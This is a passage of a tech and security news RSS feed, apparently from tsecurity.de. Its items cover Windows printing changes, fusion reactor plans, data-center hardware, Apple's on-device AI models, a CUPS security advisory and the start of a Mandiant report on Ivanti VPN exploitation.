<p><em>You can follow me on social media! Join me on <a href="https://bsky.app/profile/jonnyevanssays.bsky.social" target="_blank" rel="noreferrer noopener">BlueSky</a>,  <a href="http://www.linkedin.com/in/jonnyevans" target="_blank" rel="noreferrer noopener">LinkedIn</a>, <a href="https://social.vivaldi.net/@jonnyevans" target="_blank" rel="noreferrer noopener">Mastodon</a> and <a href="https://thecorenews.substack.com/p/welcome-to-the-core?r=5l3lg" target="_blank" rel="noreferrer noopener">The Core</a>.</em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Windows 11: Ready Print wird zum Standard für Druckertreiber]]></title>
<description><![CDATA[Microsoft hat vor einigen Tagen mit der Auslieferung von Windows 11 Build 26300.8553 im Experimental-Kanal des Insider-Programms begonnen. Mit der neuen Vorabversion beginnt die Umstellung des Umgangs mit Druckern auf das sogenannte Windows Ready Print.			(Weiter lesen)]]></description>
<link>https://tsecurity.de/de/3588088/it-security-nachrichten/windows-11-ready-print-wird-zum-standard-fuer-druckertreiber/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3588088/it-security-nachrichten/windows-11-ready-print-wird-zum-standard-fuer-druckertreiber/</guid>
<pubDate>Wed, 10 Jun 2026 17:09:30 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<a href="https://winfuture.de/news,159253.html"><img hspace="5" border="0" align="left" alt="Drucker, Canon, printer, Maxify GX7050, Megatank" width="1920" height="1080" src="https://i.wfcdn.de/teaser/1920/57746.jpg"></a>
			Microsoft hat vor einigen Tagen mit der Auslieferung von <a href="https://winfuture.de/special/windows11/" title="Windows 11 Special">Windows 11</a> Build 26300.8553 im Experimental-Kanal des Insider-Programms begonnen. Mit der neuen Vorabversion beginnt die Umstellung des Umgangs mit Druckern auf das sogenannte Windows Ready Print.			(<a href="https://winfuture.de/news,159253.html">Weiter lesen</a>)]]></content:encoded>
</item>
<item>
<title><![CDATA[Commonwealth Fusion Makes the Physics Case For Its 400 MW Reactor]]></title>
<description><![CDATA[Commonwealth Fusion has published five peer-reviewed papers laying out the physics case for ARC, its planned 400 MW fusion power plant, which would follow the company's smaller SPARC tokamak now under construction. The papers suggest ARC could produce more energy than it consumes using high-tempe...]]></description>
<link>https://tsecurity.de/de/3587441/it-security-nachrichten/commonwealth-fusion-makes-the-physics-case-for-its-400-mw-reactor/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3587441/it-security-nachrichten/commonwealth-fusion-makes-the-physics-case-for-its-400-mw-reactor/</guid>
<pubDate>Wed, 10 Jun 2026 13:22:21 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Commonwealth Fusion has published five peer-reviewed papers laying out the physics case for ARC, its planned 400 MW fusion power plant, which would follow the company's smaller SPARC tokamak now under construction. The papers suggest ARC could produce more energy than it consumes using high-temperature superconducting magnets, molten-salt heat extraction, and 15-minute fusion pulses. Ars Technica reports: ARC will be a tokamak that hosts fusion between hydrogen's two heavier isotopes, deuterium and tritium. This reaction results in a helium nucleus and releases a neutron and radiation. The helium transfers heat to the plasma, maintaining the conditions needed for fusion, but it is otherwise a waste product, referred to as "ash" in the fusion context. The neutron and radiation, however, are put to use. Part of that use is simply imparting energy into a blanket of molten salt that surrounds the fusion chamber. That energy, in the form of heat, will be used to drive a turbine that produces the electricity. The molten salt includes lithium ions; when one lithium isotope absorbs a neutron, it decays into more helium, plus tritium that can be used as fuel for the reactor. There are isotopes present that will also release additional neutrons, allowing this process to generate sufficient fuel.
 
Overall, the present design of ARC is expected to produce about 1.13 GW of fusion power, with 500 MW of that extracted as electricity. Some of that (100 MW) will be needed to power the plant's operations, leaving 400 MW to be sent to the grid. The rest of the energy is either kept in the tokamak to maintain the fusion reactions or lost due to inefficiencies in the heat and energy transfer of the system. There's a lot of uncertainty about these numbers; the 1.13 GW is just the center of a range of potential values running from 900 MW to 1.3 GW, so the 400 MW output may need to be adjusted up or down accordingly.
 
Some of that 400 MW comes during periods where fusion is not occurring. The nuclear reactions will occur within 15-minute-long periods that will be interspersed with one minute resets. The resets are meant to be kept short enough that nothing has much of a chance to cool down before it gets heated up again -- thermal inertia will let it continue generating power. That will be one of the key differentiators with SPARC, which doesn't have the heat extraction needed to maintain stable fusion for these long time periods, and so can't maintain the near constant temperatures needed for reliable power generation.
 
It's inevitable that parts of the device will be exposed to radiation and perhaps fusion plasma. The inner walls of the reactor will be shielded by tungsten, which will limit erosion by the conditions. Meanwhile, the vacuum vessel is designed to be replaced every one to two years. The papers note that this flexibility will allow them to make some design changes even after ARC is built. To enable this, the whole tokamak is meant to split in half for maintenance.<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=Commonwealth+Fusion+Makes+the+Physics+Case+For+Its+400+MW+Reactor%3A+https%3A%2F%2Fhardware.slashdot.org%2Fstory%2F26%2F06%2F10%2F0319259%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Fhardware.slashdot.org%2Fstory%2F26%2F06%2F10%2F0319259%2Fcommonwealth-fusion-makes-the-physics-case-for-its-400-mw-reactor%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://hardware.slashdot.org/story/26/06/10/0319259/commonwealth-fusion-makes-the-physics-case-for-its-400-mw-reactor?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[AI power efficiency the target of Lotus Microsystems energy  advances]]></title>
<description><![CDATA[Lotus Microsystems has introduced vStrata, a new power-delivery architecture aimed at Improving data center power efficiency, a pressing concern even in a non-AI environment.



At the heart of the platform is the company’s proprietary Power Interposer Technology (PIT), a silicon-based interposer...]]></description>
<link>https://tsecurity.de/de/3585959/it-security-nachrichten/ai-power-efficiency-the-target-of-lotus-microsystems-energy-advances/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3585959/it-security-nachrichten/ai-power-efficiency-the-target-of-lotus-microsystems-energy-advances/</guid>
<pubDate>Tue, 09 Jun 2026 22:38:19 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p><a href="https://www.lotus-microsystems.com/">Lotus Microsystems</a> has introduced vStrata, a new <a href="https://www.networkworld.com/article/4119769/openai-shifts-ai-data-center-strategy-toward-power-first-design.html">power-delivery architecture</a> aimed at Improving data center power efficiency, a pressing concern even in a non-<a href="https://www.networkworld.com/article/3838986/ai-driving-a-165-rise-in-data-center-power-demand-by-2030.html">AI environment</a>.</p>



<p>At the heart of the platform is the company’s proprietary Power Interposer Technology (PIT), a silicon-based interposer architecture that enables power conversion and delivery closer to the processor package. The PIT uses a vertical power delivery (VPD) chip and package designed to deliver electrical power directly through the package stack to the processor.</p>



<p>By shortening current paths and integrating thermal management directly into the power-delivery structure, vStrata aims to reduce conversion losses while improving cooling efficiency.</p>



<p>According to <a href="https://www.youtube.com/watch?v=ESKpxnMmG08">Lotus Microsystems</a>, the module can achieve point-of-load efficiencies of up to 96% while reducing power-conversion losses by more than 50% compared with conventional approaches.</p>



<p>“We focus very much on a topology technology that is more efficient, so it basically means that for the amount of power that you put into the power converter, you get more power out, and you have less power losses,” said <a href="https://www.linkedin.com/in/hanshasselbyandersen/">Hans Hasselby-Andersen, CEO of Lotus.</a></p>



<p>“Another unique thing about our solution is where we utilize our silicon substrate technology to effectively remove the heat from the solution, so where others are focusing on the power side of power delivery, we also handle the thermal issues related to power conversion,” he added.</p>



<p>No power converter is 100% efficient, usually about 90% efficient. Lotus’s PID is 96% efficient, making for a 60% reduction in power loss. With banks of power consuming GPUs, that adds up, so much so data centers could potentially stick with air cooling rather than be forced to use liquid cooling.</p>



<p>“There’s no doubt that if you deploy this technology across the board, you would definitely be able to reduce the energy that you put into cooling data centers, and not only energy, but issues with water consumption,” said Hasselby-Andersen.</p>



<p>Lotus Microsystems states that vStrata maintains compatibility with existing power-management controllers and reference designs, potentially easing adoption among semiconductor and system vendors.</p>



<p>vStrata comes in the form of power supplies, and Lotus is working with major server vendors and hyperscalers, but the new power supplies are not suitable for retrofitting into existing server racks. “There’s no industry standard [for server power supplies], so there’s no default footprint you can live up to,” said Hasselby-Andersen.</p>



<p>Engineering samples of the LSC0580 – the first vStrata platform module – are scheduled to ship in Q3 2026.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Arista unveils 1.6T rack-scale switch family for AI infrastructure]]></title>
<description><![CDATA[Arista Networks has taken the wraps off its 7060XE7 Series, a new portfolio of 1.6T networking platforms designed to provide the foundation for rack-scale AI infrastructure. 



The 7060XE7 family features fixed switch platforms and configurable rack-scale systems, targeting racks for vertical an...]]></description>
<link>https://tsecurity.de/de/3585875/it-security-nachrichten/arista-unveils-16t-rack-scale-switch-family-for-ai-infrastructure/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3585875/it-security-nachrichten/arista-unveils-16t-rack-scale-switch-family-for-ai-infrastructure/</guid>
<pubDate>Tue, 09 Jun 2026 21:53:43 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Arista Networks has taken the wraps off its <a href="https://www.arista.com/en/products/7060xe7-series" target="_blank" rel="noreferrer noopener">7060XE7 Series</a>, a new portfolio of 1.6T networking platforms designed to provide the foundation for rack-scale AI infrastructure. </p>



<p>The 7060XE7 family features fixed switch platforms and configurable rack-scale systems, targeting racks for vertical and horizontal AI workflows. All will run <a href="https://www.networkworld.com/article/4134083/arista-hints-at-in-the-works-telemetry-tools-to-manage-ai-fabrics.html">Arista’s Extensible Operating System</a> (EOS), which includes low-latency and intelligent packet buffering to manage the intense microbursts typical of AI communication and collective patterns, Arista stated. </p>



<p>The 7060XE7 family is built on <a href="https://www.networkworld.com/article/4001239/broadcoms-102-4-tbps-tomahawk-6-targets-million-xpu-ai-clusters.html">Broadcom Tomahawk</a> 6 silicon. Arista is also working with AMD on next-generation compute silicon and NICs to enable scale-out AI fabrics. the company said.</p>



<p>Strategically, the 7060XE7 Series signifies <a href="https://www.networkworld.com/article/4111354/arista-rides-ai-wave-but-battle-for-campus-networks-looms.html">Arista’s transition</a> from offering standalone, high-performance switches to providing rack-scale systems that can handle the extreme density, power, and thermal efficiency AI requires, Arista stated. The platforms allow customers to build scale-up and scale-out AI fabrics using air, liquid and hybrid-cooled technology.</p>



<p>Specific configurations include:</p>



<ul class="wp-block-list">
<li><strong>7060XE7-64PS and 7060XE7-64PRS 4U Rack Switches:</strong> Available in Q4, these air-cooled systems offer support for pluggable Integrated heat sink (IHS) and Riding heat sink (RHS) optics. IHS is aimed at current air-cooled data centers, and RHS would be aimed at future <a href="https://www.networkworld.com/article/4144556/arista-targets-ai-data-centers-with-new-liquid-cooled-pluggable-optic-module.html">liquid‑cooled AI fabrics</a> and extreme port density, Arista stated.</li>



<li><strong>7060XE7-64PRS-RV3-L</strong>: This is a specialized 2OU liquid-cooled platform for high-density clusters, featuring 224G SerDes. This system uses DC power from the ORv3 rack and contains no internal fans, integrating with liquid-cooled XPU servers to maximize power efficiency. It will be available in Q1 2027.</li>



<li><strong>7060XE7-128PE:</strong> Also coming in Q1 2027, these devices provide 128 800G ports in an air-cooled 4RU design, utilizing 100G SerDes, for environments requiring deployment flexibility and backward compatibility.</li>
</ul>



<p>On the software side, EOS is the featured network operating system, but the family also supports open-source software such as Software for Open Networking in the Cloud (SONIC) and OpenSwitch. </p>



<p>One of the portfolio’s key features is the inclusion of full support for Open Compute Project’s Multipath Reliable Connection (MRC). MRC is an RDMA‑based transport protocol that allows a single reliable connection to simultaneously use many network paths over Ethernet.</p>



<p>“MRC is an open protocol where endstation NICs stripe their traffic across multiple links and paths to the receiver, with out of order packets automatically handled,” wrote Arista’s Kenneth Duda, president and CTO, and Alan Judge, distinguished engineer, in a <a href="https://blogs.arista.com/blog/three-genius-ideas-for-ai-fabrics?utm_medium=email&amp;_hsenc=p2ANqtz--WV6LFrLQIOXZHtuGYeEKiuwNfFuJQ9m-MGbQfYkZKH83a2Ipt6bx62xTsOxZmx0DeDEgfQwoZB6ctv378pILXW8A8pFeDYbZ-yk3y2xnwaZAJDUs&amp;_hsmi=422934827&amp;utm_content=422934827&amp;utm_source=hs_email">blog</a> about the technology. “MRC responds to network congestion signals (ECN and packet trimming), shifting load to the best-performing paths, and avoiding links and paths that can’t actually reach the destination altogether.”</p>



<p>MRC monitors each path, steering around congestion, avoiding paths with link errors, and avoiding failed links, the authors stated. “We’ve proven in production that this approach achieves very high fabric utilization with good load balancing, while interoperating seamlessly with scale-across and WAN networks utilizing standard dynamic routing protocols,” Duda and Judge wrote.</p>



<p>The software also supports load balancing, congestion management, telemetry and diagnostics, and other technologies that will be core to AI networking, Arista stated.</p>



<p>The new Arista family joins a growing ecosystem of vendors looking to tap into the <a href="https://www.naddod.com/ai-insights/why-1-6t-networking-is-becoming-the-core-of-next-generation-ai-clusters?srsltid=AfmBOoqj9QMeYLmDLWs2APuF2t3EpzTOlhSV7l0PPdbSbyDCm0ECuEo5">1.6T Ethernet</a> world, which includes <a href="https://www.networkworld.com/article/4130263/cisco-amps-up-silicon-one-line-delivers-new-systems-and-optics-for-ai-networking.html">Cisco</a>, <a href="https://www.networkworld.com/article/4080459/nvidia-looks-to-power-ai-factory-networks.html">Nvidia</a>, Celestica and others.</p>



<p>“Arista Network’s new 7060XE7 Series is a strong signal of where large-scale AI fabrics are heading: higher bandwidth, better power efficiency, and tighter integration between compute, optics, silicon, cooling, and network operating software,” wrote <a href="https://www.linkedin.com/in/samehboujelbene/">Sameh Boujelbene</a>, vice president, data center switch and AI networks market research for Dell Oro, in a <a href="https://www.linkedin.com/posts/samehboujelbene_arista-networks-is-excited-to-announce-the-activity-7470170955978534912-t5xu?utm_source=share&amp;utm_medium=member_desktop&amp;rcm=ACoAAAIU6MwBFxiRF-TyMhFw863yphjSyKaHiqc">LinkedIn post</a>. Among the features that stand out to her are “strong customer and ecosystem validation from Microsoft Azure, Oracle Cloud Infrastructure, Meta, AMD, and Broadcom.”</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[MIT boffins take electrospray nozzles out of the cleanroom, into the 3D printer]]></title>
<description><![CDATA[Who said sub-millimeter, three-layer science juice had to be expensive to squirt?]]></description>
<link>https://tsecurity.de/de/3585603/it-nachrichten/mit-boffins-take-electrospray-nozzles-out-of-the-cleanroom-into-the-3d-printer/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3585603/it-nachrichten/mit-boffins-take-electrospray-nozzles-out-of-the-cleanroom-into-the-3d-printer/</guid>
<pubDate>Tue, 09 Jun 2026 20:32:54 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Who said sub-millimeter, three-layer science juice had to be expensive to squirt?]]></content:encoded>
</item>
<item>
<title><![CDATA[On-device AI agents hit a hard memory limit. Apple's new architecture routes around it.]]></title>
<description><![CDATA[On-device AI models have stayed small because the entire weight set has to live in DRAM, capping practical parameter counts well below what server-side deployments use. Enterprise architects evaluating agentic workloads have had to choose between capable cloud-dependent models and limited on-devi...]]></description>
<link>https://tsecurity.de/de/3585602/it-nachrichten/on-device-ai-agents-hit-a-hard-memory-limit-apples-new-architecture-routes-around-it/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3585602/it-nachrichten/on-device-ai-agents-hit-a-hard-memory-limit-apples-new-architecture-routes-around-it/</guid>
<pubDate>Tue, 09 Jun 2026 20:32:48 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>On-device AI models have stayed small because the entire weight set has to live in DRAM, capping practical parameter counts well below what server-side deployments use. Enterprise architects evaluating agentic workloads have had to choose between capable cloud-dependent models and limited on-device ones. Apple's third-generation foundation models, announced at WWDC26, <!-- -->break that constraint by moving the weight set off DRAM entirely<!-- -->.</p><p>The AFM 3 family was developed in collaboration with Google and spans five models: two on-device and three server-based, all running within Apple's Private Cloud Compute boundary. The server-side models, including AFM 3 Cloud Pro for agentic tool use and complex reasoning, run on Nvidia GPUs in Google Cloud. The on-device architecture is Apple's own. AFM 3 Core Advanced is a 20-billion-parameter model that stores weights in NAND flash rather than DRAM.</p><p>"Instead of forcing the entire model into DRAM, the full model is stored in flash memory," <a href="https://machinelearning.apple.com/research/introducing-third-generation-of-apple-foundation-models">Apple's research team wrote</a>. "Because NAND-to-DRAM bandwidth is too slow to swap weights token by token, as standard MoE models require, AFM 3 Core Advanced makes routing decisions per prompt."</p><h2>How the architecture actually works</h2><p>The memory wall Apple is working around is one every local AI developer runs into.

"You can't put 20B parameters in RAM at any reasonable precision,"<a href="https://www.linkedin.com/in/awni-hannun-36382a17/"> Awni Hannun</a>, a researcher at Anthropic and former Apple research scientist,<a href="https://x.com/awnihannun/status/2064202168618422396"> posted on X</a>. "To make it work they are using pretty exotic architecture by today's standards. A small model predicts from the query (or prompt) which experts to load from NAND into RAM."</p><div></div><p>That prediction-and-load mechanism has three distinct components, each driven by the hardware constraints of consumer silicon.</p><p><b>The full 20B weight set lives in flash, not DRAM.</b> AFM 3 Core Advanced stores its entire parameter set in NAND flash rather than active memory. Standard on-device deployments require the full model to fit in DRAM, which is what caps their parameter counts. Apple's approach, which it calls Instruction-Following Pruning (IFP) and developed with its own researchers, treats flash as the model's permanent home and DRAM as a working buffer for whichever experts a given prompt requires.</p><p><b>Expert routing happens once per prompt, not per token.</b> In a conventional Mixture of Experts model, a router selects different experts for every token generated — which would require continuous weight movement between flash and DRAM at inference speed. NAND-to-DRAM bandwidth cannot support that. AFM 3 Core Advanced routes once at prompt time, selects a fixed expert set, loads it into DRAM alongside always-active shared experts, and generates all tokens from that same configuration.

 "The key distinction from a typical MoE is that you do this once per query and then generate all the tokens with the same experts," Hannun wrote.</p><p><b>Active parameter count scales from 1B to 4B depending on task complexity.</b> Rather than running a fixed model size for every request, AFM 3 Core Advanced adjusts how many parameters it activates based on what the task requires — 1 billion for simpler operations, up to 4 billion for harder ones, all drawn from the 20-billion-parameter pool in flash. </p><h2>What Apple has and hasn't disclosed</h2><p>The architecture paper is detailed on the memory design and sparse activation mechanism. It is less forthcoming on practical deployment constraints.</p><p>Apple's profiling tools expose timing but not the metrics that decide production viability. "Energy, memory bandwidth, thermal? Not in the docs," Marco Abis, who is building Ziraph, a profiler for local AI on Apple silicon,<a href="https://x.com/capotribu/status/2064267804476383427"> posted on X</a>. "A notable gap, given those decide most of on-device performance." </p><div></div><p>Abis also did not find a statement in Apple's documentation — across the Core AI docs, the Foundation Models docs or the Private Cloud Compute security post — of when an on-device request transparently offloads, or whether that routing is visible to the developer or the user. For enterprises that need to document where inference runs, that is a direct compliance problem.</p><p>Not all the information is currently available. Apple has indicated a full technical report with benchmarks is coming later this summer.</p><h2>What this means for enterprise architects</h2><p>Regulated industries evaluating agentic AI deployments now have a concrete architectural decision to make.</p><ul><li><p><b>The DRAM wall for on-device agents just moved. </b>Enterprises evaluating agents that need to run without a cloud round-trip now have a 20-billion-parameter local option to evaluate. The constraint shifts from model capability to device hardware.</p></li><li><p><b>The private/cloud boundary is now an architectural decision, not a default. </b>Simpler requests stay on-device; complex agentic tasks route to AFM 3 Cloud Pro on Private Cloud Compute. Apple has not publicly specified when a request offloads or whether that routing is visible to the developer — a gap that complicates policy decisions for organizations that need to document where inference runs.</p></li><li><p><b>The agentic server tier depends on Google Cloud. </b>AFM 3 Cloud Pro runs on Nvidia GPUs in Google Cloud. The Private Cloud Compute guarantee covers data privacy. It does not eliminate the Google Cloud dependency for server-side inference.</p></li></ul><p>AFM 3 Core Advanced gives enterprises a 20-billion-parameter on-device option that did not exist before WWDC26. Whether it is deployable at scale depends on answers Apple has not yet published. Those details are due in the summer technical report.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Brother MFC-L8970CDW color laser printer review: A downsized, upgraded spin on the company's best enterprise printer]]></title>
<description><![CDATA[A smaller, but better flagship for Brother’s Workhorse laser line.]]></description>
<link>https://tsecurity.de/de/3584729/it-nachrichten/brother-mfc-l8970cdw-color-laser-printer-review-a-downsized-upgraded-spin-on-the-companys-best-enterprise-printer/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3584729/it-nachrichten/brother-mfc-l8970cdw-color-laser-printer-review-a-downsized-upgraded-spin-on-the-companys-best-enterprise-printer/</guid>
<pubDate>Tue, 09 Jun 2026 15:47:11 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A smaller, but better flagship for Brother’s Workhorse laser line.]]></content:encoded>
</item>
<item>
<title><![CDATA[USN-8405-1: CUPS vulnerabilities]]></title>
<description><![CDATA[Ariel Silver discovered that CUPS incorrectly handled username comparisons
during authorization checks. A local attacker could possibly use this issue
to gain unauthorized access to restricted operations. (CVE-2026-27447)

Asim Viladi Oglu Manizada discovered that CUPS incorrectly handled
notify-...]]></description>
<link>https://tsecurity.de/de/3582145/unix-server/usn-8405-1-cups-vulnerabilities/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3582145/unix-server/usn-8405-1-cups-vulnerabilities/</guid>
<pubDate>Mon, 08 Jun 2026 18:45:58 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Ariel Silver discovered that CUPS incorrectly handled username comparisons
during authorization checks. A local attacker could possibly use this issue
to gain unauthorized access to restricted operations. (CVE-2026-27447)

Asim Viladi Oglu Manizada discovered that CUPS incorrectly handled
notify-recipient-uri values in the RSS notifier. A remote attacker could
possibly use this issue to overwrite lp-writable files and cause a denial
of service. (CVE-2026-34978)

Jacob Newman discovered that CUPS incorrectly handled filter option strings
when processing job attributes. An attacker could use this issue to cause
CUPS to crash, resulting in a denial of service, or possibly execute
arbitrary code. (CVE-2026-34979)

Asim Viladi Oglu Manizada discovered that CUPS incorrectly handled
page-border values in shared PostScript queues. A remote attacker could
possibly use this issue to execute arbitrary code. (CVE-2026-34980)

Asim Viladi Oglu Manizada discovered that CUPS incorrectly handled
localhost authentication to attacker-controlled IPP services. A local
attacker could possibly use this issue to overwrite arbitrary files
and execute arbitrary code. (CVE-2026-34990)

Tomer Fichman discovered that CUPS incorrectly handled negative
job-password-supported values. A local attacker could possibly use this
issue to cause CUPS to crash, resulting in a denial of service.
(CVE-2026-39314)

Tomer Fichman discovered that CUPS incorrectly handled temporary printer
deletion. An attacker could possibly use this issue to cause CUPS to crash,
resulting in a denial of service, or to execute arbitrary code.
(CVE-2026-39316)

Tomer Fichman discovered that CUPS incorrectly handled certain malformed
SNMP responses. An attacker could possibly use this issue to obtain
sensitive information. (CVE-2026-41079)]]></content:encoded>
</item>
<item>
<title><![CDATA[Slash your printing costs: Epson EcoTank ET-2400 is the cheapest all-in-one ink tank printer right now, with big savings at Amazon]]></title>
<description><![CDATA[The Epson EcoTank ET-2400 all-in-one printer prints, scans and copies while slashing ink costs, and it's discounted at Amazon right now]]></description>
<link>https://tsecurity.de/de/3581873/it-nachrichten/slash-your-printing-costs-epson-ecotank-et-2400-is-the-cheapest-all-in-one-ink-tank-printer-right-now-with-big-savings-at-amazon/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3581873/it-nachrichten/slash-your-printing-costs-epson-ecotank-et-2400-is-the-cheapest-all-in-one-ink-tank-printer-right-now-with-big-savings-at-amazon/</guid>
<pubDate>Mon, 08 Jun 2026 17:17:46 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The Epson EcoTank ET-2400 all-in-one printer prints, scans and copies while slashing ink costs, and it's discounted at Amazon right now]]></content:encoded>
</item>
<item>
<title><![CDATA[Thermal Grizzly: Erste Lüfter, WireView II, eine Noctua Edition und TG Coating]]></title>
<description><![CDATA[Thermal Grizzly hat auf der Computex gleich eine ganze Palette an neuen Produkten vorgestellt. Mit den Gehäuselüftern „DeltaMate Purrformante“ in zwei Dimensionen befindet sich auch der Einstieg in ein ganz neues Produktsegment darunter. Updates gab es auch für WireView und die Full-Cover-GPU-Was...]]></description>
<link>https://tsecurity.de/de/3581000/it-nachrichten/thermal-grizzly-erste-luefter-wireview-ii-eine-noctua-edition-und-tg-coating/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3581000/it-nachrichten/thermal-grizzly-erste-luefter-wireview-ii-eine-noctua-edition-und-tg-coating/</guid>
<pubDate>Mon, 08 Jun 2026 11:47:19 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<img src="https://pics.computerbase.de/1/2/3/0/5/3-758bd4828be7fd99/article-640x360.e1d885df.jpg"><p>Thermal Grizzly hat auf der Computex gleich eine ganze Palette an neuen Produkten vorgestellt. Mit den Gehäuselüftern „DeltaMate Purrformante“ in zwei Dimensionen befindet sich auch der Einstieg in ein ganz neues Produktsegment darunter. Updates gab es auch für WireView und die Full-Cover-GPU-Wasserkühler der DeltaMate-Serie.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[The IoT Appliance Repair Gap: When Your Wi-Fi Dishwasher Breaks, Who Actually Fixes It?]]></title>
<description><![CDATA[In this post, I will talk about the IoT appliance repair gap and aswer the question – when your Wi-Fi dishwasher breaks, who actually fixes it? Connected appliances have created a category of failure that most authorised service networks are not set up to handle. When a smart dishwasher stops wor...]]></description>
<link>https://tsecurity.de/de/3579744/it-security-nachrichten/the-iot-appliance-repair-gap-when-your-wi-fi-dishwasher-breaks-who-actually-fixes-it/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3579744/it-security-nachrichten/the-iot-appliance-repair-gap-when-your-wi-fi-dishwasher-breaks-who-actually-fixes-it/</guid>
<pubDate>Sun, 07 Jun 2026 19:37:04 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>In this post, I will talk about the IoT appliance repair gap and aswer the question – when your Wi-Fi dishwasher breaks, who actually fixes it? Connected appliances have created a category of failure that most authorised service networks are not set up to handle. When a smart dishwasher stops working in a Dubai apartment, […]</p>
<p>The post <a href="https://secureblitz.com/iot-appliance-repair-gap/">The IoT Appliance Repair Gap: When Your Wi-Fi Dishwasher Breaks, Who Actually Fixes It?</a> appeared first on <a href="https://secureblitz.com/">SecureBlitz Cybersecurity</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Cutting Edge, Part 3: Investigating Ivanti Connect Secure VPN Exploitation and Persistence Attempts]]></title>
<description><![CDATA[Written by: Matt Lin, Robert Wallace, Austin Larsen, Ryan Gandrud, Jacob Thompson, Ashley Pearson, Ashley Frazer

 
Mandiant and Ivanti's investigations into widespread Ivanti zero-day exploitation have continued across a variety of industry verticals, including the U.S. defense industrial base s...]]></description>
<link>https://tsecurity.de/de/3578877/it-security-nachrichten/cutting-edge-part-3-investigating-ivanti-connect-secure-vpn-exploitation-and-persistence-attempts/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3578877/it-security-nachrichten/cutting-edge-part-3-investigating-ivanti-connect-secure-vpn-exploitation-and-persistence-attempts/</guid>
<pubDate>Sun, 07 Jun 2026 08:22:29 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div class="block-paragraph_advanced"><p>Written by: Matt Lin, Robert Wallace, Austin Larsen, Ryan Gandrud, Jacob Thompson, Ashley Pearson, Ashley Frazer</p>
<hr>
<p> </p></div>
<div class="block-paragraph_advanced"><p>Mandiant and Ivanti's investigations into widespread <a href="https://cloud.google.com/blog/topics/threat-intelligence/suspected-apt-targets-ivanti-zero-day" rel="noopener" target="_blank"><u>Ivanti zero-day exploitation</u></a> have continued across a variety of industry verticals, including the U.S. defense industrial base sector. Following the initial publication on Jan. 10, 2024, Mandiant observed mass attempts to exploit these vulnerabilities by a small number of China-nexus threat actors, and development of a mitigation bypass exploit targeting <a href="https://forums.ivanti.com/s/article/KB-CVE-2023-46805-Authentication-Bypass-CVE-2024-21887-Command-Injection-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure-Gateways?language=en_US" rel="noopener" target="_blank"><u>CVE-2024-21893</u></a> used by <u>UNC5325</u>, which we introduced in our <a href="https://cloud.google.com/blog/topics/threat-intelligence/investigating-ivanti-zero-day-exploitation" rel="noopener" target="_blank"><u>"Cutting Edge, Part 2" blog post</u></a>. </p>
<p>Notably, Mandiant has identified UNC5325 using a combination of living-off-the-land (LotL) techniques to better evade detection, while deploying novel malware such as LITTLELAMB.WOOLTEA in an attempt to persist across system upgrades, patches, and factory resets. While the limited attempts observed to maintain persistence have not been successful to date due to a lack of logic in the malware's code to account for an encryption key mismatch, it further demonstrates the lengths UNC5325 will go to maintain access to priority targets and highlights the importance of ensuring network appliances have the latest updates and patches.</p>
